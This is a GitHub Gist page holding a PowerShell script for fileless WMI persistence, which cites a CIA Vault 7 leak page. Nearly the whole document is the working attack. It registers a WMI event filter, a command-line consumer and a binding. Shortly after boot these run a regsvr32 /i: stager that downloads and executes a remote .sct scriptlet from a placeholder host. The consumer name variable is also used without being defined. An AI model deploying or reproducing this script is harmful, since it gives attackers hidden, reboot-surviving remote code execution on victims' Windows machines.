-
-
Save mmyyhack/e9e72bbbf2aa65df1d1c0b7a32a995b3 to your computer and use it in GitHub Desktop.
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
| # https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
| <# | |
| .SYNOPSIS | |
| This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
| #> | |
| $EventFilterName = "Fileless WMI Persistence SystemUptime" | |
| $StagerPayload = "C:\Windows\System32\regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll" | |
| # Create event filter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = $EventFilterName | |
| Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs | |
| # Create CommandLineEventConsumer | |
| $CommandLineConsumerArgs = @{ | |
| Name = $EventConsumerName | |
| CommandLineTemplate = $StagerPayload | |
| } | |
| $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs | |
| # Create FilterToConsumerBinding | |
| $FilterToConsumerArgs = @{ | |
| Filter = $Filter | |
| Consumer = $Consumer | |
| } | |
| $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment